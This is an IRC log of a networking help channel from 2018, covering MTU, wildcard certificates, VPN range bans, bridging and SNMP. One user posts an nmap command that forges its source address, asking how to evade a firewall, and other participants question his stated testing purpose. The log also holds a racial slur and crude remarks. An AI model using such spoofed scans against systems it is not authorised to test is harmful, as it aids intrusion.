--- Log opened Mon Apr 09 00:00:38 2018 00:01 < wiresharked> Goop: Does increasing the MTU help with slowdowns? 00:09 <+catphish> wiresharked: are you just some kind of automatic nonsense spewing bot? 00:10 < wiresharked> catphish: No 00:10 <+catphish> then please stop doing so 00:11 < wiresharked> Increasing the MTU size is not a good thing then? 00:11 <+catphish> seriously 00:12 <+catphish> such nonsense, no context, mostly fed up with it 00:13 < wiresharked> This is to increase network performance 00:14 <+catphish> mtu needs to be set consistently across a vlan based on the capabilities of all devices, it's very rare to use anything but 1500 on ethernet 00:15 < wiresharked> I'm on wifi though 00:15 < tds> you can do jumbo frames, but that sorta goes against the ethernet standards iirc, so probably best to stick to 1500 00:15 < wiresharked> tds: I'm not using ethernet 00:16 <+catphish> same applies to wifi though 00:16 <+catphish> though potentially different values 00:16 < wiresharked> catphish: Oh OK 00:17 <+catphish> and depending what it's bridged to 00:17 < wiresharked> The MTU in windows is set to 0. Does that mean that DHCP adjusts it? 00:18 < allizom> tds, or anyone else: do you know about my second question? 00:18 <+catphish> probably just default 00:19 < tds> alizom: oh, sorry - doing it on the host header sounds reasonable to me 00:19 < allizom> what other possibilities are there? 00:19 < wiresharked> catphish: OK, I thought an MTU of 0 just means to let the DHCP server set it 00:19 < tds> I guess you could have two IPs, one serving the redirect and one serving whatever site you wanted to serve (and dns spoof to the first) 00:20 < allizom> I see 00:21 < lupine> https://voe.social/system/media_attachments/files/000/088/962/original/a1f5efb68a1309ac.png 00:21 < lupine> repeat after me 00:21 < lupine> hnnnnnnnnnnnnnnnnnnnnnnnnnnng 00:51 < orlock> Hmmmmm 00:54 < zamanf> hello 00:54 < zamanf> is it possible to set a speed limit on udp packages in linux? 00:55 < redrabbit> tc 00:55 < redrabbit> ^use that 01:24 < inc0gn1t0> Super noob issue. I have virtualbox, and I want to copy stuff from the desktop to the vm. I ticked the option to allow, but I'm the vm account is guest user, which is an account I made, and used once, then deleted, before ever using vm. Do I need to sign re-add that same account and log in to it to do this? Alao tried with usb stick, same problem, doesn't show the drive 01:25 < inc0gn1t0> And why did it use an account that I had deleted? 01:25 < orlock> i dont even understand what you are talking about 01:26 < inc0gn1t0> Virtual machines.. 01:26 < inc0gn1t0> Vm 01:26 < DoYouKnow> inc0gn1t0: you should be able to copy things to the shared folder even when not logged in on the vm 01:26 < DoYouKnow> err 01:26 < DoYouKnow> nevermind, other way around 01:26 < DoYouKnow> you should be able to share things from a logged out pc 01:27 < DoYouKnow> to an external one, using SMB 01:27 < inc0gn1t0> But do the things I share, have to be on that account and not my normal admin account 01:27 < orlock> Sis he actually mention SMB anywhere? 01:28 < DoYouKnow> inc0gn1t0: if you're not on the same user/group you have to log in specifying the \ syntax 01:28 < DoYouKnow> err, if you're not on the same machine 01:28 < DoYouKnow> *local vs. network account 01:29 < DoYouKnow> hmm 01:29 < inc0gn1t0> I am on the same machine. I use admin account where everything on the desktop I want is, but vm is user that was deleted. 01:30 < inc0gn1t0> (Luckily I remembered that pw) 01:30 < DoYouKnow> `then just use VM_PC\username, password: password manually 01:31 < DoYouKnow> what's the group it's in? 01:31 < DoYouKnow> or is it a local account? 01:31 < inc0gn1t0> Local I believe 01:31 < DoYouKnow> if it's a local account, then just log in with a different local account 01:31 < DoYouKnow> windows or linux? 01:31 < inc0gn1t0> Win10 01:31 < DoYouKnow> map network drive is what used to be used 01:32 < inc0gn1t0> I hate it 01:32 < DoYouKnow> I haven't used it in a while, though 01:32 < DoYouKnow> it's not bad 01:32 < inc0gn1t0> Same. I always use linux 01:32 < DoYouKnow> but linux has a better SAMBA 01:32 < DoYouKnow> (at times) 01:32 < DoYouKnow> been using the SAMBA on Mint/Ubuntu a lot 01:33 < DoYouKnow> for pc to pc transfer, when a usb stick is not available 01:34 < inc0gn1t0> I know, I want my debian back, but it's a brand new laptop and can play all my games from steam... kinda don't wanna give that up lol. And windows doesn't like dual boot linux 01:34 < orlock> we are getting rid of our last Samba server 01:35 < orlock> Not that linux isnt grea,t but if you are windows desktops everywhere and have multiple AD and Windows fileservers already, a single Samba server is just a pain 01:36 < inc0gn1t0> What's samba 01:36 < inc0gn1t0> I keep hearing that 01:38 < gray79> its a file sharing protocol 01:39 < orlock> It's the open source server that provides SMB/CIFS shares in the same way windows file servers do 01:40 < orlock> so you can use non-windows systems to share files to Windows clients 01:40 < forgotten> what do you mean windows doesn't like linux dual boot? 01:41 < orlock> Did somebody mention dual boot? 01:44 < orlock> time for a kernel upgrade 01:49 < inc0gn1t0> So the problem is that it says I need to "install guest additions cd" under device options. Bit clicking it does nothing 01:53 < forgotten> i obv came into this convo way late. 01:53 < inc0gn1t0> forgotten: I've always had problems with dual boot. Windows doesn't like u putting nonwindows stuff in 01:54 < forgotten> inc0gn1t0: maybe the problem is your setup process :) 01:54 < inc0gn1t0> I've followed the tutorials to the tee. It worked, but constant switching eventually gave me the bsod 01:54 < inc0gn1t0> Blue screen of death 01:55 < inc0gn1t0> Maybe it's because my distro wasn't made to be an everyday os 01:56 < gray79> anyone knows why Wake on Lan doesn't work reliably through the WAN via port forwarding? 01:56 < gray79> i've been pulling my hair for a while 01:57 < forgotten> the two operate independantly, lots of hard power offs etc. will eventually take its toll on ntfs 01:57 < chezidek> gray79: isnt it a broadcast packet? 01:58 < inc0gn1t0> It prolly was hard shitdowns😶 used to be a bad habit of mine 01:58 < inc0gn1t0> *shutdowns 01:58 < inc0gn1t0> Lol 01:58 < gray79> my router can only do forwarding to a specific device. The thing is that it works just not always 01:58 < forgotten> yep. or just forgetting to plug it back in on a laptop and it dies cause of the battery etc 01:58 < gray79> idk whats the problem 01:59 < forgotten> gray79: sending multiple packets? 01:59 < gray79> yep 01:59 < inc0gn1t0> Isn't there a way to autoinitiate a proper shutdown at a certain battery percentage? 01:59 < forgotten> inc0gn1t0: probably ya 02:00 < forgotten> hell i could probably powershell that with a scheduled task if not. 02:00 < forgotten> anything is possible :D 02:00 < inc0gn1t0> Cron? 02:00 < forgotten> scheduled tasks on windows. 02:00 < inc0gn1t0> Ah. Thank u 02:01 < inc0gn1t0> Been years since I was behind a windows machine lol 02:15 < SporkWitch> inc0gn1t0: lucky; they forced one on me for work :'( 02:16 < inc0gn1t0> Damn lol 02:19 < SporkWitch> best part: there are TWO things that i need for work that i can't do natively. One is our chat application, which is only on windows and mac (can just throw it in a VM or WINE), the other is a particular web interface that requires silverlight (can do it in WINE). The rest is standard web interfaces that work fine in chrome and firefox, or accessing servers and routers via ssh and telnet lol 03:26 < mast> Anyone here use/work with rosewill server cases? 03:35 * fryguy has 03:35 < forgotten> fries? 03:35 < forgotten> onion rings? 03:36 < forgotten> TATOR TOTS?! 03:40 < Irritiable|LT> WHAT 'R' TATERS?! forgotten 03:41 < Irritiable|LT> You know? Boil 'em, mash 'em, stick 'em in a stew! 03:42 < forgotten> :D 03:42 < forgotten> we wants to eats it already! stupid fat hobbit 03:46 < K350> I'm on Ubuntu 17.10. Inernet connection works fine. BUT in nmcli device status my ethernet device is shown as not connected. So are all other devices. Why is that ? 03:46 < Irritiable|LT> Your mom. 03:47 < K350> My devices are al lset in Network Manager. But , again, in nmcli they're shown as not beign connected. While I'm connected ot internet. 03:47 < forgotten> K350: maybe try #Ubuntu ? 03:49 < forgotten> im watching this God Code show on History channel.. just thinking to myself isn't this what Indiana Jones Raiders of the Lost Arc already solved? :D 03:49 < K350> forgotten: Yeah, But I think people in this channel are more skilled regardign networking 03:50 < forgotten> K350: it sounds like a glitch in Ubuntu 17.10 / nmcli. have you confirmed in previous verion etc? 03:50 < forgotten> it works fine for me on Kali rolling 03:51 < K350> forgotten: No, I'm trying to identify, locate, the source of the problem 03:51 < K350> forgotten: what version do you run ? 03:51 < forgotten> version of what? 03:52 < K350> forgotten: Sorry, what dist version of Kali are you running? 03:52 < forgotten> latest. rolling. fully up to date. 03:53 < forgotten> uses nmcli version 1.10.6 03:53 < forgotten> is your ubuntu load on a bare metal machine or vm? 03:54 < K350> forgotten: what is the output of cat /etc/issue on your machine ? 03:54 < forgotten> forgotten@kali-vultr:~$ cat /etc/issue 03:54 < forgotten> Kali GNU/Linux Rolling \n \l 03:54 < ne0> I was on a irc channel op said he can ban the whole vpn network I use as well as my phone and DNA 03:55 < ne0> How can he ban the entire network and what's DNA? 03:55 < forgotten> sometimes people refer to DNA as IP space 03:55 < ne0> can you elaborate please 03:57 < forgotten> lmao 03:57 < forgotten> guess my kali machine scared him off 03:57 < ne0> I'm here 03:57 < forgotten> you're k350? 03:57 < ne0> nope 03:58 < ne0> DNA - meaning please 03:58 < forgotten> ne0: just network DNA.. like what are all your subnets you own etc. 03:58 < Irritiable|LT> ne0: Dynamic something acid 03:59 < ne0> what the neck is that? 03:59 < Irritiable|LT> "deoxyribonucleic acid" 03:59 < Irritiable|LT> a self-replicating material present in nearly all living organisms as the main constituent of chromosomes. It is the carrier of genetic information. 03:59 < Irritiable|LT> :) 03:59 < ne0> I didn't know you were funny 04:00 < Irritiable|LT> Nor did I. 04:00 < ne0> laaaaame 04:06 < SporkWitch> ne0: if he's an op, then yes, it's fairly trivial to ban an entire IP range. What companies own what IP ranges can be looked up easily. 04:07 < ne0> sporkwitch: hi 04:07 < ne0> company is Hotspot Shied 04:08 < ne0> https://www.hotspotshield.com 04:08 < SporkWitch> ne0: good example would be how all tor exit nodes were blocked across this entire IRC network until a year or two ago (daft decision, if you ask me; it's trivial to roll a new cert) 04:08 < SporkWitch> ne0: k? what about it? 04:08 < ne0> just letting you know the vpn I use 04:10 < ne0> Banning a DNA? what's a DNA 04:10 < SporkWitch> ne0: lol, it's on uMatrix's blacklist so it doesn't even let you go to the main site lol 04:11 < ne0> what main site? 04:11 < SporkWitch> ne0: here ya go, all the IP ranges owned by them https://bgp.he.net/search?search%5Bsearch%5D=anchorfree&commit=Search 04:12 < ne0> must be more ips then that 04:12 < ne0> Ireland 04:12 < ne0> nx 04:12 < ne0> nz* 04:12 < ne0> Australia etc 04:12 < SporkWitch> those are the ones registered under the company name listed at the bottom of the page you linked 04:13 < ne0> oh lol 04:14 < SporkWitch> that's also quite a few addresses. 256*5 + (2^10)*2 04:14 < ne0> So if some dumb fuk is using the same vpn ip as me and gets banned then everyone with that vpn is banned from that room? 04:15 < SporkWitch> everyone currently on that IP, sure; banning whole ranges is USUALLY reserved for repeat offenders from the same provider and a failure of that provider to sanction their users 04:15 < SporkWitch> (that's why tor was blocked across the board for a long time) 04:15 < ne0> ah got cha 04:16 < ne0> what's the DNA thing? 04:16 < Irritiable|LT> https://www.wired.com/2017/01/get-even-easier-hide-dark-web/ -- Tor's ran by the FBI now anyway. 04:16 < Irritiable|LT> "The attack that allowed that takedown of supposedly untraceable sites—now believed to have been developed by Carnegie Mellon security researchers and obtained by the FBI with a subpoena" 04:17 < superkuh> FUD 04:17 < SporkWitch> ne0: that was already explained earlier 04:17 < forgotten> but if life lock and experian can monitor the dark web, it really isn't too complicated ;) 04:17 < superkuh> And even if it was it's better than the normal web because on Tor you actually own your domain rather than lease it at the whim of some commercial company blown in the winds of politics and mass media. 04:18 < SporkWitch> forgotten: traffic correlation attacks have been very effective for years now anyway 04:18 < superkuh> Most of the traffic to my website comes in on the Tor domain. And that's after filtering out bots. 04:18 < forgotten> im just makin a jab :P dont mind me 04:18 < superkuh> People on tor are still surfing. 04:18 < superkuh> Unlike the clear web where it's all centralized shit. 04:19 < SporkWitch> honestly the only thing i've ever used tor for is when i need to check the clearnet in relation to something i was discussing on i2p; been on the internet way too long, any agency that's interested has plenty of profiling information they could likely make reasonable assumptions about what my traffic was. using it in correlation with i2p, though, is effective in that it masks any correlation 04:19 < SporkWitch> between my activity on i2p and the clearnet 04:20 < SporkWitch> (whereas NOT using tor to, say, look something up in relation to a discussion on i2p, would CREATE a correlation between my i2p identity and my clearnet one) 04:20 < Irritiable|LT> https://www.csoonline.com/article/2228873/microsoft-subnet/no-conspiracy-theory-needed--tor-created-for-u-s--gov-t-spying.html 04:20 < Irritiable|LT> Another fun link. 04:22 < ne0> sporkwitch: banning DNA is banning a range of ips? 04:22 < SporkWitch> ne0: yes; bit archaic terminology, i haven't heard it used in years, but it was in use in the past 04:23 < ne0> How do I access the ips of a company 04:23 < ne0> e.g express vpn 04:24 < ne0> and why doesn't Netflix blacklist all of express vpns ips? 04:24 < SporkWitch> ne0: one option is the site i linked earlier 04:24 < SporkWitch> ne0: because netflix doesn't actually WANT to region-lock anything; they stand to make more money the more people are using their service, regardless of where they are. They will do the absolute minimum to block so as not to get sued or have publishers pull out 04:25 < Peng_> I wish Netflix didn't block in-country Hurricane Electric tunnels 04:25 < ne0> ah got cha 04:26 < ne0> who's umatrix? 04:27 < SporkWitch> script-blocking plugin 04:27 < ne0> which site am I black listed from 04:28 < ne0> You said earlier 04:29 < SporkWitch> the VPN service you use; their main site was blacklisted. Normally it'll auto-allow first-party stuff (e.g. the site you're on) and require you to allow stuff from other sites. If a site is particularly nasty, it'll even block it when you try to visit it. 04:29 < SporkWitch> in short: your VPN provider is sketchy as fuck 04:32 < ne0> I'm on the site now with my vpn and it's not blacklisted??? 04:32 < SporkWitch> are you using umatrix? 04:33 < ne0> no 04:33 * SporkWitch makes "there you have it" gesture 04:34 < ne0> what is it? 04:35 < SporkWitch> asked and answered... 04:35 < ne0> omg 04:35 < ne0> add on for firefox 04:35 < conr> What would the UFW rule to allow this SSH connection? 04:35 < conr> :1234 -> 10.0.0.1:1234 (Modem/Router) -> Fwd 10.0.99.1:1234 (2nd Router) -> Fwd 10.0.99.100:22 (Ubuntu box using VPN) 04:36 < ne0> can't even use umatrix with my vpn 04:36 < SporkWitch> why not? that's sketchy too, and probably why they blacklist them lol 04:37 < ne0> You told me umatrix blacklisted it...... 04:38 < SporkWitch> yes 04:38 < ne0> I'm not using firefox but if I did I wouldn't be able to if I was using my vpn 04:38 < SporkWitch> umatrix blacklists them, implying the site itself is sketchy and/or unsafe in some way. now you're saying you can't use umatrix with your VPN somehow; if that's true, that is even sketchier, and probably why umatrix blacklists them 04:38 < ne0> right? 04:38 < k-man> what does the APN do with respect to a celluar data connection? 04:39 < ne0> ah got you 04:39 < ne0> the site not the software 04:40 < SporkWitch> i feel like we're fighting a translation barrier; i notice it's a german provider, sprecht du Deutsch? 04:40 < ne0> https://bgp.he.net/search?search%5Bsearch%5D=anchorfree&commit=Search 04:40 < ne0> I only see 7 ip address? 04:40 < SporkWitch> no you don't, you see 7 ranges 04:41 < SporkWitch> 5 of those ranges are /24's, so 256 (254 usable) addresses each. the other two are /22's, which means (2^10)-2 usable addresses each. 04:41 < ne0> ah I get it banning DNA means banning the range 04:42 * SporkWitch facepalms 04:42 < ne0> where are the other countries 04:42 < ne0> like China and stuff.... 04:43 < SporkWitch> as was ALSO answered earlier, they either don't have any in those regions or they're registered under a different name. 04:43 < forgotten> wow can't believe we're still on this topic 04:43 < ne0> How can I bring up them up? 04:44 < SporkWitch> forgotten: why do you think i just facepalmed? it's circling, most of it answered 5 different ways already, yet the same things. i'd think it was a chatbot if the script weren't so bad 04:44 < forgotten> SporkWitch: you're way more patient than I. 04:44 * forgotten tips hat 04:45 < SporkWitch> forgotten: i'm currently in a customer-facing position; i've also been doing this in IRC and various games for 3 decades now, not to mention admin on a 5k+ member discord server with partner status lol 04:45 < SporkWitch> on the upside, i'm now off the clock and can drink in good conscience lol 04:46 < forgotten> im jealous. i got 2.25 more hours and a 30min drive home still =/ 04:46 < forgotten> while my beer is calllllling 04:46 < forgotten> :P 04:46 < SporkWitch> my condolences 04:46 < SporkWitch> wanna work tier 1 tech support? we're hiring lol 04:46 < SporkWitch> (in fairness, our tier 1 is more like most places tier 2) 04:47 < TV`sFrank> Samsquamch season 04:47 < forgotten> doubt you could pay what i'd want 04:47 < TV`sFrank> uh wrong chan 04:47 < SporkWitch> depends lol; i'm only making 4k/yr less than my mate who finished his B.Sc. and landed a programming gig lol 04:47 < forgotten> 150k+ usd? 04:48 < SporkWitch> yeah, probably not lol 04:48 < forgotten> ;) 04:48 < SporkWitch> forgotten: that's entry level, though, right? :P lol 04:48 < ne0> sporkwitch: what's your degree in? 04:48 < forgotten> fairly senior. 04:49 < SporkWitch> ne0: i'm 3 credits short of an A.Sc. in electronics engineering, 3 semesters short of a B.Sc. in computing security (nearly all of that liberal arts classes) 04:49 < wadadli> Does anyone know if Let's Encrypt allows wildcard domains certs? 04:49 < ne0> my nigga! 04:49 < SporkWitch> wadadli: they explicitly do not 04:49 < forgotten> wadadli: as of feb. they do 04:49 < ne0> that's impressive 04:49 < SporkWitch> i stand corrected; i must have missed that email 04:50 < ne0> what's a A.Sc? 04:50 < forgotten> :) feb 2018 they opened up wild card certs 04:50 < wadadli> forgotten: do you know if certbot can procure one? 04:50 < alanhuang> version 0.22 for sure 04:50 < alanhuang> and yes, ACME v2 endpoint is live now 04:50 < SporkWitch> ne0: https://lmgtfy.com/?q=what+is+a.sc. 04:51 < wadadli> alanhuang: sweet. 04:51 < forgotten> wadadli: like alanhuang said, 0.22 should have the wildcard support 04:51 < ne0> lol 04:51 < ne0> I'm studying business this year 04:51 < ne0> I'm 31 though 04:51 < ne0> first year 04:52 < wadadli> I'm trying to generate a certificate for my Router's hotspot captive portal. 04:52 < wadadli> since it's hotspot.techcafe.ag and I already have the domain techcafe.ag 04:52 < SporkWitch> when i hear MBA all i can think of Van Wilder... 04:52 < wadadli> I figured a wildcard domain would be easier. 04:52 < wadadli> cert* 04:53 < ne0> have you guys heard of pwc? 04:53 < alanhuang> *.domain.example does not match domain.example, fyi 04:53 < alanhuang> pwc - pricewaterhousecoopers? 04:53 < SporkWitch> while arguably easier, it does have security implications. and honestly, given how letsencrypt renewals work, it seems to me like it'd be easier to have per-host certs 04:53 < ne0> my brother is a senior there and said he can get me a job as a auditor 04:53 < ne0> when I get my degree 04:53 < wadadli> alanhuang: oh really? 04:53 < ne0> I'm 31 and he's 24 04:53 < forgotten> really depends on the services, and how you plan to automate / distribute certs. 04:53 < wadadli> darn... 04:54 < alanhuang> yes, that's how wildcards work 04:54 < ne0> alanhuang: yeah he works 80+ hours a week 04:54 < alanhuang> you could have *.domain.example and domain.example though, e.g. 04:56 < wadadli> alanhuang: darn, I just got *.techcafe.ag verified. 04:56 < wadadli> and my dns takes forever to propagate.. 04:56 < ne0> anyone here going to do networking for the big 4? 05:05 < wadadli> alanhuang: A wildcard certificate can secure any number of subdomains of a base domain (e.g. *.example.com). This allows administrators to use a single certificate and key pair for a domain and all of its subdomains, which can make HTTPS deployment significantly easier. 05:06 < alanhuang> yes, I know what wildcard dns names are 05:06 < alanhuang> what is your point 05:07 < wadadli> what you said contradicts what let's encrypt is saying 05:07 < wadadli> or am I not understanding 05:07 < wadadli> I generated *.techcafe.ag to secure anysubdomain.techcafe.ag essentially. 05:07 < alanhuang> correct, and that's what it would do 05:08 < alanhuang> most user agents would not allow *.techcafe.ag to match techcafe.ag, though 05:08 < RtMF> so add it as a SAN? 05:09 < alanhuang> exactly 05:12 < SporkWitch> which makes sense, because *.techcafe.ag doesn't match; the . is a literal 05:13 < wadadli> So firefox/chrome will not display the secure idicator on my hotspot's captive portal page? 05:13 < alanhuang> if it's techcafe.ag, no 05:13 < wadadli> it's hotspot.techcafe.ag 05:13 < alanhuang> (and assuming techcafe.ag is not a SAN - if it is, then you're good) 05:14 < alanhuang> then yes, a cert for *.techcafe.ag would match 05:14 < wadadli> OK. 05:15 < wadadli> I'd just have to generate another cert for the techcafe.ag 05:15 < wadadli> Is what you're saying. 05:15 < alanhuang> or just add it as a SAN 05:17 < wadadli> Storage Area Network? 05:17 < wadadli> It's an actually website. That's hosted somewhere. 05:18 < alanhuang> Subject Alternative Name 05:18 < alanhuang> the method by which one certificate can be valid for multiple names 05:22 < wadadli> OH. I'll have to look into that. 05:22 < wadadli> A windows PC fails to recognize the certs because their file names begin with * 05:23 < wadadli> ... 05:24 < wadadli> Hope renaming the cert doesn't alter things 05:25 < alanhuang> cert filename is meaningless 05:25 < wadadli> good 05:44 < ghal> I did something super dumb.... I factory reset my router while not being home '>> 05:44 < ghal> Is there anything I can do? It's an Asus-ac68u 05:46 < House> ghal : does this help? https://www.cvedetails.com/vulnerability-list/vendor_id-3447/product_id-27483/Asus-Rt-ac68u-Firmware.html 05:48 < ghal> House: hard to say since I have no idea what firmware I'm running 05:53 < r3m> / 05:54 < electromagnetism> remote admin is probably disabled by default nothing you can do man 05:56 < ghal> Actually I had to disable that myself but yeah 05:58 < ghal> I have no cell phone in the apartment I could bounce over. Laptop and main relay on the router which I cannot access with either the hostname or the ip 05:59 < ghal> This is why you don't stay up for 2 days lol 06:35 < pabed> hi guys , how is it possible my vpn client to two vpn servers at the same time? 06:36 < pabed> *connect 06:37 < skyroveRR> Why would you want to? 06:38 < pabed> I need to know what is happened for ip header at this state? 06:39 < skyroveRR> What do you think happens? 06:39 < pabed> and I need to know why route to internet via one them , while both of them can route me to internet 06:40 < pabed> because I think it has to add extra field to packed by per vpn server 06:41 < pabed> *packet 07:13 < rud0lf> hello, is it a good place to ask a question related to tp-link wifi router config? 07:15 < plasma> hi rud0lf :) 07:15 < rud0lf> hi plasma :) 07:15 < rud0lf> !voice plasma 07:15 < rud0lf> ;) 07:15 < plasma> :D 07:15 < plasma> it is :) 07:15 < rud0lf> i use tp-link range extender, and i like to enable mac filtering on a router 07:16 < rud0lf> regardless what mac i use for extender (i've found 3 different macs), when i enable filtering the extender dies (wifi range diodes go off, no access to extender page) 07:18 < NERD-k> Hello, I have a problem. I am using Fedora-27, and i use shadowsocks-libev. 07:19 < NERD-k> use PROXY socks5, but it always give me the message `Failed to receive SOCKS4 connect request ack.` 07:20 < NERD-k> The web brower is still work 07:21 < NERD-k> I just cannot use curl, git clone and etc in TUI 08:21 < R3D--> cable unplugged "( 08:21 < R3D--> :( 08:21 < R3D--> but cable is plugged 08:39 < NERD-k> Hello, how can let all net use PROXY(socks5), and shutdown PROXY??? 08:40 < NERD-k> My computer system is Fedora-27 08:48 <+pppingme> NERD-k you want to let everyone use it then shut it off? 09:01 < Talker> i just bought a thin client computer that i meant to run pfsense with vpn on. but now i'm debating whether i should use the computer for only pfsense with vpn, or run openVPN, bittorrent downloading, plex media senter, coutchpotato, sonarr, the whole shebang... 09:03 < confusedjoe32> hey guys i wanna suck her toes 09:29 < vhudrox> someone on #freenode referred me here to discuss this https://imgur.com/a/B5ids 09:30 < vhudrox> any thoughts? 09:34 < ychaouche> hello ##networking 09:34 < ychaouche> How do I spoof my IP w/o getting caught by the firewall ? 09:34 < ychaouche> I tried : sudo nmap -Pn -n -sS -p 143 -S 29.30.40.10 -e eth4 --disable-arp-ping 10.10.10.19 09:35 < ychaouche> but tcpdump on the destination doesn't show any sign of incoming connexions 09:36 <@pppingme> ychaouche there's about 1000 problems with what you're doing. 09:36 <@pppingme> first, your isp most likely filters on egress, so they are going to drop it 09:37 <@pppingme> second, chances are, your firewall does the same, drops packets from a network it doesn't know 09:37 < ychaouche> I'm staying in the LAN 09:37 < ychaouche> both source and destination are in the LAN 09:38 < ychaouche> I want so simulate an access from outside to one of my servers to test new firewall rules on that server. 09:39 <@pppingme> what are you really trying to do? 09:39 < ychaouche> I just said 09:40 <@pppingme> how do you know the packets aren't showing up on the destination? 09:41 < ychaouche> tcpdump 09:42 < ychaouche> https://gist.github.com/ychaouche/17335e68ca97aa12ed4f0d42fc6c1ddf 09:55 < Spice_Boy1> any librenms experts in here? 09:55 < Spice_Boy1> in particular, writing applications that use extend snmp oid 10:03 < cgm9> ychaouche: the target needs to have a route for that remote ip 29.x.x.x pointed at your local lan ip 10:03 < cgm9> right now is prob using the default gw to send traffic back 10:03 < cgm9> or try that nmap from default gw,if you can 10:04 < ychaouche> cgm9: I don't need to get the packets back, really. 10:04 < TV`sFrank> cgfbee: s/he is selling this shpeil in 2 different channels and users in both are 'skeptical' 10:04 < ychaouche> so why should it have the remote IP routed to my local lan ip ? 10:05 < ychaouche> I only need to know if it gets the packet, I don't need the responses back. 10:05 < ychaouche> (the acks) 10:05 < TV`sFrank> And yet you SAY you're testing your own firewall, which wouldn't send acks. "Hmmmm" 10:06 < hey2> that's a pretty good SYN something is wrong 10:25 < wadadli> I have a computer that I manage for a family member. The ISP always seems to change the public IP, what are some solutions to ensure reliable connection to this PC remotely. Without contacting ISP for a static IP. 10:25 < Spice_Boy1> do you manage it from somewhere with a static IP? 10:25 < at0m> wadadli: afraid.org provides free DNS 10:26 < wadadli> Spice_Boy1: Not quite sure what you mean? 10:26 < at0m> wadadli: .. so even when the client's IP changes, you can still connect to a name you can easily remember 10:26 < Spice_Boy1> (6:24:36 PM) wadadli: I have a computer that I manage for a family member. <-- where do you manage it from? 10:26 < wadadli> From my PC. 10:26 < Spice_Boy1> ffs 10:26 < TV`sFrank> lol 10:27 < wadadli> Well it's a valid answer isn't it lol. 10:27 < _Mental> lol 10:27 < TV`sFrank> If you're a complete noob who has no clue or business managing anything over a network 10:28 < wadadli> at0m: Is this something I install on the PC? 10:34 < ychaouche> wadadli: you configure it on the router (your modem) 10:34 < ychaouche> or rather their modem 10:34 <+xand> if it supports that 10:35 <+xand> otherwise on the PC 10:35 <+xand> otherwise you could use one of those services that provides remote PC access 10:35 <+xand> like errrr logmein maybe 10:36 <+xand> wadadli: how do you login to the PC? 10:38 < wadadli> xand: The windows login manager service, not sure what it's actually called. 10:38 <+xand> remote desktop? 10:38 < wadadli> Oh you mean how do I access it's display server? 10:38 < wadadli> I use Team Viewer. 10:38 <+xand> k 10:39 < ^7heo> moin catphish 10:39 <+catphish> 'ello 10:39 < wadadli> ychaouche: AH OK. I'll check it out. 10:39 <+xand> doesn't that connect via their servers so it doesn't need a known IP address? 10:40 < ^7heo> (I swear, I'm not even stalking you) 10:40 < linux_probe> stalk tdees nutz 10:41 < ychaouche> wadadli: yes, why do you even need a static IP when accessing w/ teamviewer ? 10:41 < wadadli> xand: Yes but there are other services which this machine hosts that I use. I don't necessarily need access to the desktop. 10:41 < wadadli> ychaouche: I never said that. 10:42 <+xand> I see 10:42 < _Mental> If you can connect to the remote PC via a 3rd party service, does this not give you a "reliable connection" ? 10:43 < ychaouche> _Mental: teamviewer only for desktop, apparently he accesses other services 10:46 < _Mental> Hmmm I guess I don't understand the question. If you wanted to automate something, I believe TeamViewer's logs show what the remote PC's IP is. 10:47 < _Mental> Though I think at that point, the afraid.org seems much more elegant 10:56 < wadadli> I have a router with exactly two NICs, an Ethernet (ether1) and a Wireless (wlan1). wlan1 is configured in bridge ap mode. 10:57 < wadadli> I added a virtual wlan (wlan2) and put into a bridge, assigned an ip to the bridge and then connected a device to the AP. 10:57 < wadadli> Device is unable to access the internet. 11:00 <+catphish> wadadli: the device is connected to wlan1? does that have anything to do with wlan2, or the bridge? 11:00 <+catphish> or do you mean the device is connected to wlan2? 11:00 < wadadli> wlan2 which is the virtual interface. 11:01 <+catphish> you mean a virtual LAN on the wlan1 hardware? 11:01 <+catphish> (like a second SSID)? 11:02 < wadadli> Yes. 11:02 <+catphish> ok, and which devices are in bridges? 11:02 < wadadli> So, wlan1 is in a bridge-hotspot and wlan2 is in bridge-staff 11:03 < wadadli> Those are the only bridges I have. 11:03 <+catphish> there's really no reason to put just one device in a bridge by the way, but it's not a problem 11:04 <+catphish> ok, so you have bridge-staff, and that has an IP, and wlan2 is in the bridge, and a device is connected to that wlan 11:04 <+catphish> does the client device have an ip address? 11:04 < wadadli> well I am trying to give devices that connect to these SSID different networks. 11:04 <+catphish> yes, that's ok, you're doing it correct so far :) 11:05 < wadadli> Yes, I gave bridge-staff a 192.168.253/24 11:05 < wadadli> ether1 is 192.168.1.2 11:05 < wadadli> I want staff that connect to wlan2 to be on the same network. 11:06 <+catphish> the same network as what? ether1? 11:06 < wadadli> yes. is that the problem? 11:06 < wadadli> and yes client got an ip addr. 11:06 <+catphish> yes, your requirement just got more complicated 11:06 < wadadli> it received 192.168.1.253 11:07 < wadadli> oh darn lol 11:07 <+catphish> right now bridge-staff and ether1 are separate networks 11:07 < wadadli> do I have to put ehter1 in bridge staff? 11:07 <+catphish> if you want them to be the same network, you need to put ether1 and wlan2 in the same bridge, yes 11:07 <+catphish> but... that will likely break everything you already have set up 11:08 < wadadli> if I remove the dhcp server for bridge-staff 11:08 < wadadli> would that fix things? 11:08 <+catphish> you need to remove dhcp from bridge-staff, you need to remove the IP from ether1, assign it to bridge-staff instead, and put ether1 into bridge-staff 11:09 <+catphish> then ether1 and wlan2 will be in the same network, because they'll be in the same bridge-staff 11:09 <+catphish> they'll share the same IP range 11:09 <+catphish> then you just need to make sure bridge-hotspot still works 11:09 <+catphish> hope that all makes sense 11:10 < wadadli> OK, let's give it a go. 11:11 <+catphish> good luck :) 11:12 < wadadli> do I put the dhcp client on bride-staff or ether1? 11:12 <+catphish> bridge-staff 11:12 <+catphish> once an interface is in a bridge *everything* is on the bridge 11:12 < wadadli> ah. 11:12 <+catphish> (except wireless settings) 11:13 < wadadli> so my isps router no longer assigns my static ip based on my mac 11:13 < wadadli> normally would give me 192.168.1.2 11:13 < wadadli> getting 192.168.1.4 11:13 < wadadli> Maybe it thinks I'm still connected? 11:14 <+catphish> you probably have a new MAC 11:14 <+catphish> the bridge may be using the wireless interface's MAC rather than the physical interface's MAC, you can probably change it 11:17 < wadadli> oh so the hotspot can't work that way it seems 11:17 <+catphish> it should do 11:18 <+catphish> it just needs to know that its WAN interface is now bride-staff 11:18 < wadadli> oh? 11:19 < wadadli> so what about wlan1 being in bridge hotspot? 11:19 < linux_probe> shatspot, poot pooot 11:20 < Lightsword> I’m trying to query the mac address table of a switch using dot1dTpFdbAddress = 1.3.6.1.2.1.17.4.3.1.1 which was working on most switches I’ve tried but doesn’t seem to work on all, apparently there’s something called SNMP community string based indexing that I need to use if the switch has vlans, any idea how I’m supposed to query with that? 